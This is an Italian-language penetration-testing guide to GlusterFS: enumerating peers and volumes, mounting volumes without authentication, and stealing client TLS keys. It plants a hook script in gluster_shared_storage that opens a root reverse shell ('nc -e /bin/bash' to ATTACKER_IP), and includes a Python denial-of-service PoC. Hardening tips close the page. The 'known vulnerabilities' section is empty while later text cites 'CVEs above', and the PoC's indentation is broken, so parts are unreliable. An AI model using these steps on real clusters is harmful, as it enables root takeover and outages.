24007-24008-24009-49152 - Pentesting GlusterFS

Reading time: 5 minutes

Informazioni di base

GlusterFS è un sistema di file distribuito che combina lo storage di più server in un namespace unificato. Il demone di gestione (glusterd) ascolta per impostazione predefinita su 24007/TCP e istruisce i brick del piano dati che iniziano a 49152/TCP (una porta per brick, in incremento). Le versioni precedenti alla 9.x utilizzavano 24008–24009/TCP per il trasporto dei brick, quindi potresti ancora incontrare quelle porte nei cluster legacy.

PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)

Suggerimento: 24007 risponde alle chiamate RPC anche quando i nodi solo storage non esportano alcun volume; pertanto il servizio è un obiettivo pivot affidabile all'interno di grandi infrastrutture.

Enumerazione

Installa le utility client sulla tua macchina di attacco:

sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu

1. Scoperta dei peer e salute

# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status

2. Riconoscimento del volume

# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all

3. Montare senza privilegi

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster

Se il montaggio fallisce, controlla /var/log/glusterfs/<vol_name>-<uid>.log sul lato client. I problemi comuni sono:

• Applicazione di TLS (option transport.socket.ssl on)
• Controllo degli accessi basato su indirizzo (option auth.allow <cidr>)

Risoluzione dei problemi del certificato

Ruba i seguenti file da qualsiasi nodo client autorizzato e posizionali in /etc/ssl/ (o nella directory mostrata nel log degli errori):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Vulnerabilità Conosciute (2022-2025)

Controlla sempre gluster --version su ogni nodo; i cluster eterogenei sono comuni dopo aggiornamenti parziali.

Sfruttare gluster_shared_storage (Escalation dei Privilegi)

Anche nelle versioni recenti molti amministratori lasciano il volume speciale gluster_shared_storage leggibile da tutti perché semplifica la geo-replicazione. Il volume contiene modelli di cronjob che vengono eseguiti con root su ogni nodo.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

Se hooks/1/ non è presente, cerca /ss_bricks/ – il percorso esatto può variare con la versione principale.

Denial-of-Service PoC (CVE-2023-26253)

#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())

Eseguire lo script provoca il crash di glusterfsd < 11.0.

Indurimento e Rilevamento

• Aggiornare – l'attuale LTS è 11.1 (luglio 2025). Tutti i CVE sopra sono stati risolti.
• Abilitare TLS per ogni brick:

gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem

• Limitare i client con elenchi CIDR:

gluster volume set <vol> auth.allow 10.0.0.0/24

• Esporre la porta di gestione 24007 solo su una VLAN privata o tramite tunnel SSH.
• Controllare i log: tail -f /var/log/glusterfs/glusterd.log e configurare la funzione audit-log (volume set <vol> features.audit-log on).

Riferimenti

• GlusterFS security advisories
• CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash